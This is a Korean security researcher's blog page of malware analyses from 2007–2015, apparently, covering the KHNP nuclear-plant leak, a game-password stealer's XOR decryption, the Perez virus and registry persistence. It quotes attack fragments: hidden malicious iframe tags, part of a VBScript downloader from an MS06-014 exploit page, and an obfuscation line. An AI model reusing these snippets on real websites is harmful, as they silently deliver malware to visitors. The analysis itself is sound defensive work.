태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

바이러스분석2015. 3. 13. 10:49


'한수원 해커' 北어투, 북한조직? 추적회피용 위장술?

http://news.mt.co.kr/mtview.php?no=2015031217233656080&type=1&VML


한국수력원자력 자료를 유출했던 해커그룹이 79일만에 트위터에서 활동을 재개한 가운데, 이들이 사용한 어투에도 관심이 쏠리고 있다. 

12일 자칭 '원전반대그룹'이 남긴 트윗글에서 "통채로"라는 단어와 파일목록 중 '통화 요록'이라는 표현이 북한식 어투라는 주장이 제기되고 있다. 

이들 그룹은 트윗글에서 "북유럽과 동남아, 남아메리카의 여러 나라들에서 원전자료를 사겠다고 하는데 자료를...통채로 팔았다가 박대통령님 원전수출에 지장이 될까바 두렵네요."라고 남겼다. 해커가 공개한 파일 중 '대통령 통화요록'이라는 제목의 파일도 있다.

해커가 사용한 '통채'는 '통째'의 북한식 표현이며, '요록'이라는 표현도 '사상범취급 요록' 등 북한에서 주로 사용되는 낱말이라는 것. 

이를 두고 일각에서는 '원전반대그룹'이 북한의 해커조직 아니냐는 분석을 내놓고 있다. 실제 지난해 12월 이들이 원자력연구소 사이버테러를 협박할 당시 트윗글에도 '아닌 보살', '악당, '무뇌' 등 북한식 표현방식이 사용돼왔다.


원전 해커, 이번에도 북한식 표현 사용

http://www.yonhapnews.co.kr/bulletin/2015/03/13/0200000000AKR20150313065500003.HTML?input=1195m


http://viruslab.tistory.com/4081


http://viruslab.tistory.com/4087







Posted by viruslab

댓글을 달아 주세요

바이러스분석2015. 1. 13. 16:54


언제까지 우길껀지..


전체 분석 문서는 관계자들에게만 공유



107페이지 문서 중 설명 빼고 이미지만 공개!

























Posted by viruslab

댓글을 달아 주세요

바이러스분석2014. 12. 28. 09:05


블로그에 글을 올리면 정말 신기하게도 얼마 후 관련된 뉴스가 나온다.

이름은 모르는 듯 싶은데 어떻게 알고 블로그를 보고 전화를 했다는 언론사 기자분들도 많은 상태다. 신상털림? ㅡ.ㅡ+

일단 인터뷰는 정중히 사양하고 있고, 글 올리기가 좀 부담스럽다.


----------------------------------------------------------------------------


2014년 12월 11일 / 20일 : 한수원 스피어 피싱 내용 최초 공개

http://viruslab.tistory.com/3786

http://viruslab.tistory.com/3814


2014년 12월 25일 : "한수원 퇴직자 명의로 '악성코드' 이메일 발송"

http://news.mt.co.kr/mtview.php?no=2014122516523812206


----------------------------------------------------------------------------


2014년 12월 21일 오전 10시 : 북한식 표현 최초 공개

http://viruslab.tistory.com/3817


2014년 12월 21일 오후 09시 : '한수원 해킹' 북한해킹 패턴 유사한 '사이버테러'

http://news.mt.co.kr/mtview.php?no=2014122119503745925&type=&&MLA


-----------------------------------------------------------------------------


2014년 12월 24일 : John 내용 최초 공개

http://viruslab.tistory.com/3863

http://viruslab.tistory.com/3879

http://viruslab.tistory.com/3874


2014년 12월 27일 : 해킹 때마다 등장한 'John'…북한 해킹 가능성 높아져

http://news.tvchosun.com/site/data/html_dir/2014/12/27/2014122790152.html




Posted by viruslab

댓글을 달아 주세요

바이러스분석2011. 7. 11. 16:24


 

http://erteam.nprotect.com/176




Posted by viruslab

댓글을 달아 주세요

바이러스분석2009. 9. 2. 09:52



ASCII - U E s

ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz 0123456789+/=
012345678901234567890123456789012345 67890123456789012345678901 2345678901234

Decode

U - 20(D) - 00010100(B)
E -  4(D) - 00000100(B)
s - 44(D) - 00101100(B)

00010100 00000100 00101100
010100 000100 101100
010100000100101100
01010000 01001011 00
0101 0000 0100 1011 00
5 0 4 B 0
P K

최종적으로 PK 라는 값을 얻을 수 있다.


Posted by viruslab
TAG base64

댓글을 달아 주세요

바이러스분석2009. 8. 27. 17:04


2003년경에 발견됐던 파일 바이러스로 후위기생 형태이다.
XOR 이라는 섹션테이블을 생성시키며, 2,048바이트 증가된다.

XOR 문자를 검색하여 재감염되지 않게 하며, 내부에 특정 문구를 하드코딩해 두었다.

-= XOR 2009 Valhalla =- Assembled 1997 .. Activated 07.2002 - devoted for peace and harmony in universe against war, racism, terrorism and cruel brutality .. remember .. life is the most important thing - not money .. it's time for a revolution NOW ....

예전에 Hex 로 분석했던 자료화면(클릭하면 큰 화면으로 보실 수 있음)

사용자 삽입 이미지
Posted by viruslab
TAG valla, xorala

댓글을 달아 주세요

바이러스분석2009. 8. 22. 10:45


최근에 국내의 특정 사이트들을 이용해서 Exploit Code 와 함께 유포되는 파일이 있습니다.

uuss.jpg -> go1.jpg -> go.jpg -> go2.jpg -> go4.jpg -> go3.jpg -> logo.swf -> tt.exe -> a.exe -> e8main0.dll

http://www.virustotal.com/analisis/07b04086fd1ffb1dbb52a3cdcdb370853d81028647f78e000a3e51577040a5f5-1250693032

tt.exe 는 다음과 같이 PE 구조를 변조해 두었습니다.

Raw Data (195988) > Size of File Image (98642)

분석을 방해하도록 PE헤더를 조작(PE Patch)한 것이죠.

사용자 삽입 이미지

PEiD v0.95 에서는 조작된 헤더도 Scan 이 됩니다.


초기에 발견되었던 tt.exe 는 실제로 실행이 되지 않았던 것으로 기억하며, 최근에 발견되고 있는 tt.exe 파일은 정상적으로 실행이 되고 있다.

tt.exe 악성코드가 실행되면 e8main0.dll 을 시스템 폴더에 생성하고, 정상 메모장(notepad.exe)을 윈도우 폴더에 AhnRpta.exe 라는 파일로 생성하고 Inernet Explorer 를 실행시켜, 특정 사이트로 연결됩니다.

http://www.k-(생략).co.kr/pds/result/0/1.txt
http://www.k-(생략).co.kr/pds/news/3.rar

1.txt 에 포함된 URL 주소에 의해서 3.rar 이라는 4바이트로 암호화 변조된 가짜 RAR 파일에 의해서 3.exe 파일이 추가로 설치되고 실행됩니다.

사용자 삽입 이미지

0x00000010 (암호화키 = DD BF F5 C4)

2A - DD = 4D (+0) 1A - C0 = 5A (+1) 86 - F6 = 90 (+1)  C5 - C5 = 00 (+1) 
E0 - DD = 03  (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
E1 - DD = 04 (+0) BF - BF = 00 (+0) F5 - F5 - 00 (+0) C4 - C4 = 00 (+0)
DC - DD = FF (+0) BF - C0 = FF (+1) F6 - F6 = 00 (+0) C4 - C4 = 00 (+0)

95 - DD = B8 (+0) C0 - C0 = 00 (+1) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
1D - DD = 40 (+0) C0 - C0 = 00 (+1) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)

DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)

DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
DD - DD = 00 (+0) BF - BF = 00 (+0) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0)
9D - DD = C0 (+0) C0 - C0 = 00 (+1) F5 - F5 = 00 (+0) C4 - C4 = 00 (+0) 

EB - DD = 0E (+0) DE - BF = 1F (+0) AF - F5 = BA (+0) D3 - C5 = 0E (+1)


일부분은 암호화키를 그대로 적용하고 특정 부분은 Hex +1 키를 하여 복호화를 한다.
이렇게 복호화된 파일은 정상적인 PE 구조의 3.EXE 파일로 변환되고 자동으로 실행된다.

초기에는 고정 4바이트 복호화키를 사용하였는데, 이러한 변조기법도 Anti-Virus 제품에서 탐지가 이루어지자 특정 키 증가 기법을 통해서 Anti-Virus 회피에 사용하고 있습니다.

3.exe -> zhido.exe -> cao220.dll -> cao110.dll

cao110.dll 파일은 실행되어 있는 Process 들에 DLL Injection 되어 작동하며, dnf.exe (던전앤파이터), maplestory.exe (메이플스토리), winbaram.exe (바람의 나라) 등의 온라인 게임 모듈의 실행을 감시하고 입력되는 사용자의 계정을 수집하고 외부로 유출을 시도합니다.

최신 윈도우 보안패치와 최신 플래시 플레이어 사용을 통해서 1차 방어를 할 수 있으며, 설치된 악성코드는 최신 버전의 Anti-Virus 제품 등을 통해서 2차 방어(치료)가 가능합니다.



Posted by viruslab

댓글을 달아 주세요

바이러스분석2009. 3. 30. 09:23


66 81 7D 80 D9 07                       cmp     word ptr [ebp-80h], 7D9h : 2009년
77 12                                         ja      short loc_6A3C37
75 26                                         jnz     short loc_6A3C4D
66 83 7D 82 04                            cmp     word ptr [ebp-7Eh], 4 : 4월

77 09                                         ja      short loc_6A3C37

75 1D                                        jnz     short loc_6A3C4D
66 83 7D 86 01                            cmp     word ptr [ebp-7Ah], 1 : 1일

--------------------------------------------------------------------------------

89 BD 60 FF FF FF                      mov     [ebp-0A0h], edi
81 FF 50 C3 00 00                       cmp     edi, 0C350h : 50,000 도메인 체크
0F 83 B9 00 00 00                        jnb     loc_6A86B0




Posted by viruslab

댓글을 달아 주세요

2009. 2. 19. 09:43

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

바이러스분석2008. 12. 15. 19:33


한국정보보호진흥원(KISA) 인터넷 침해 사고 대응지원센터에서 분석한 자료입니다.




Posted by viruslab

댓글을 달아 주세요

2008. 5. 28. 12:12

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

바이러스분석2008. 2. 27. 09:39


특정 웹 사이트가 해킹되어 일부 웹 페이지에 악성 아이프레임 소스가 추가되었다.

<iframe src=http://121.[삭제].130/comm.htm width=0 height=0></iframe>

그런데 재밌는것이 연결이 시도되는 comm.htm 내부 명령이다.

이 파일에는 스크립트 명령을 통해서 일부 코드를 알아보기 어렵게(암호화) 해 두었다.

t=eval("String.fromCharCode("+t+")");

이 코드를 복호화하면 사용자가 알아차리지 못하게 function init() / window.onload = init; 함수를 이용하여 아래와 같은 문구가 보여지게 만든다.

No web site is configured at this address.

사용자 삽입 이미지

여기서 재밌는 것은 실제 사용된 MS06-014 Exploit Code 의 최종 설치 파일이 아래와 같이 다시 comm.htm 파일이라는 것이다.

<script language="VBScript">
On Error Resume Next
exe = "http://121.[삭제].130/comm.htm"
하위생략
</script>

그렇게 되다보니 아래와 같은 오류창이 출력되는데, 이는 Temp 폴더에 vv.com 으로 생성시키는 명령 때문이다. 정상적인 PE 파일이 아니기 때문이다.

vv2="GET"
x.Open vv2, exe, False
x.Send
fname1="vv.com"
Set F = vv.CreateObject("Scripting.FileSystemObject","")
Set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)

사용자 삽입 이미지

사용자 삽입 이미지

공격자는 악성코드 링크를 지정하는 과정에서 딴 생각(?)을 했나보다. 의도하진 않았겠지만 사용자의 화면에는 위와 같은 오류창(16비트 MS-DOS 하위 시스템)이 출력된다.

공격자는 아마 자기 코드가 정상적으로 작동한다고 생각하고 있을지도 모르겠고, 나중에 발견하여 수정을 하게 될지도 모르겠다.

몇일 두고보면서 공격자의 활동을 예의주시해야 겠다.
Posted by viruslab

댓글을 달아 주세요

바이러스분석2008. 1. 21. 13:17


Regshot 2.0 버전이 공개되었다.

파일첨부

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

  1. 제가 가지고 있는 버전은 2.0.1.36 인데.. 2버전 공개하고서 홈페이지가 사라졌는지.. 안보이더군요.

    2008.06.08 14:15 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 아 그래요?^^
      지금 홈페이지 가보니 2 버전대는 없어진거 같기도 하네요.

      2008.06.09 15:01 신고 [ ADDR : EDIT/ DEL ]

바이러스분석2008. 1. 11. 10:48


Master Boot Record Rootkit 이 보고되어 이슈가 되고 있다.

http://sunbeltblog.blogspot.com/2008/01/on-that-mbr-rootkit.html
http://www2.gmer.net/mbr/
http://isc.sans.org/diary.html?storyid=3820
http://www.symantec.com/enterprise/security_response/weblog/2008/01/from_bootroot_to_trojanmebroot.html
http://www.prevx.com/blog/75/Master-Boot-Record-Rootkitis-here-and-ITW.html
http://www.antirootkit.com/blog/2008/01/03/security-flaw-in-vista-and-xp-rootkit-exploit-in-<p>the-wild/

사용자 삽입 이미지

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

바이러스분석2008. 1. 8. 15:20


판다랩 내부에서 사용하는 툴이다.

사용자 삽입 이미지
Posted by viruslab

댓글을 달아 주세요

  1. 동영상을 올릴려고 했는데, 용량제한에 걸림^^;;

    2008.01.08 18:00 신고 [ ADDR : EDIT/ DEL : REPLY ]

바이러스분석2007. 12. 5. 13:07


요 몇일 새로운 파일 바이러스가 출현했다.

감염되면 Resource 에 바이러스 코드를 추가하는 형태이며, 추가되는 RC Data 의 이름은 PERES 이다.
그래서 Kaspersky Lab 에서는 Virus.Win32.Perez 라고 명명한 상태이다.

PE + RESOURCE = PE + RES = PERES (PE리소스)

원형으로 보이는 샘플은 KAV에서 Perez 라고 진단되지 않고, 리소스 이름도 DLLRES 이다.

기존에 없던 바이러스 기법이라 할 수 있겠다.

또한 HTML 감염기법과 Autorun.inf 를 이용한 자동실행 기법도 사용된다.
바이러스 코드에는 아래와 같은 문자가 포함되어 있다.

<!HTMLFECT by [ANGELWANG] !-->

.cgi
.php
.jsp
.asp
.html
.htm

<iframe src="http://pk.[삭제].com/index.htm" width="0" height="0"></iframe>

변종 몇개가 더 존재하는데 11월 초부터 중국에서 보고되었다.

섹션은 .RIF1, .RIF2, .RIF 인데 이것은 FSG 2.0으로 압축했다가 다시 Unpack 한 과정에 생긴 섹션명이다.

사용자 삽입 이미지

제작자는 FSG 2.0으로 압축을 했다가 제대로 작동이 안되어서 RIF 가 제작한 Unpacker for FSG v2.0을 이용해서 언팩하여 사용한 것으로 보인다.

사용자 삽입 이미지

Posted by viruslab
TAG Perez

댓글을 달아 주세요

2007. 11. 12. 12:43

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

바이러스분석2007. 11. 10. 11:52


IFEO를 이용해서 특정 프로그램이 실행될 때 악성코드가 같이 실행될 수 있다.
중국산 악성코드에서 많이 이용되고 있다.

HKLM\software\microsoft\windows NT\currentversion\image file execution options

360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
RsAgent.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
shcfg32.exe
SmartUp.exe
SREng.exe
symlcsvc.exe
SysSafe.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE
WoptiClean.exe
zxsweep.exe
Posted by viruslab
TAG IFEO

댓글을 달아 주세요

바이러스분석2007. 11. 10. 11:36


요즘 기승을 부리고 있는 중국산 악성코드들이다.
Shell 부분에 달라붙어 있고, 파일이 경로에서 제거되면 다시 설치를 한다.
그래서 백신에서 한꺼번에 제거하지 않는 이상 쉽게 치료하기 어렵다.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks

{CC3596CB-D6C1-ECA1-AE51-DEEA63F6C21C}-C:\Program Files\Internet Explorer\OnlO0r.dll
{3422FB0F-95EB-458A-8B56-39552017A4EF}-C:\WINDOWS\system32\mhdoor0.dll
{5731EA1D-6AAF-4DE9-BDDA-7B390A75B286}-C:\WINDOWS\system32\wodoor0.dll
{11DB88F9-409B-475E-8FD7-411653F6D367}-C:\WINDOWS\system32\55550.dll
{32C4BAF4-0411-4000-BDFB-A6F71E669F8C}-C:\WINDOWS\system32\csdoor0.dll
{E03C23BD-35B7-49C2-BBCA-6D8CEC2507E3}-C:\WINDOWS\system32\wldoor0.dll
{A3C95A74-638D-4C6B-A856-4B27664A7F47}-C:\WINDOWS\system32\wgdoor0.dll
{D8CC4845-441C-44F8-9053-28F2EF67655B}-C:\WINDOWS\system32\dadoor0.dll
{A120A1D0-CBCC-4F9B-A183-78B27E4C1B5C}-C:\WINDOWS\system32\dh3oor0.dll
{6826A3DB-EA8E-4E67-880D-53D04C7C0BD8}-C:\WINDOWS\system32\qjdoor0.dll
{EDFF29C1-5A70-4460-AC1D-16DCB4B672F0}-C:\WINDOWS\system32\rxdoor0.dll
{68F7767A-090C-4BBF-A015-720ACC6706E2}-C:\WINDOWS\system32\wddoor0.dll
{08E909A4-B236-48DD-8BCC-90A604B93E68}-C:\WINDOWS\system32\tldoor0.dll
{781FBCC1-99C7-4AE0-95F7-66EA49E86DD7}-C:\WINDOWS\system32\zxdoor0.dll
{4E3FBFA4-F1CC-4B66-B333-B9F0FF4B4748}-C:\WINDOWS\system32\mydoor0.dll
{ABD0935D-B35A-47BD-BA9A-81678DDE74DD}-C:\WINDOWS\system32\qhdoor0.dll
{04A0CB31-FDEB-4EB8-889B-E00ED87BCE23}-C:\WINDOWS\system32\cqdoor0.dll
{BD9B003B-0BE6-4528-A9D9-B8DBACAC6B9B}-C:\WINDOWS\system32\fydoor0.dll

C:\Program Files\Common Files\fjOs0r.dll
C:\Program Files\Internet Explorer\OnlO0r.bak
C:\Program Files\Internet Explorer\OnlO0r.dll
C:\WINDOWS\system32\mhdoor0.dll
C:\WINDOWS\system32\wodoor0.dll
C:\WINDOWS\system32\55550.dll
C:\WINDOWS\system32\csdoor0.dll
C:\WINDOWS\system32\wldoor0.dll
C:\WINDOWS\system32\wgdoor0.dll
C:\WINDOWS\system32\dadoor0.dll
C:\WINDOWS\system32\dh3oor0.dll
C:\WINDOWS\system32\qjdoor0.dll
C:\WINDOWS\system32\rxdoor0.dll
C:\WINDOWS\system32\wddoor0.dll
C:\WINDOWS\system32\tldoor0.dll
C:\WINDOWS\system32\zxdoor0.dll
C:\WINDOWS\system32\mydoor0.dll
C:\WINDOWS\system32\qhdoor0.dll
C:\WINDOWS\system32\cqdoor0.dll
C:\WINDOWS\system32\fydoor0.dll
Posted by viruslab

댓글을 달아 주세요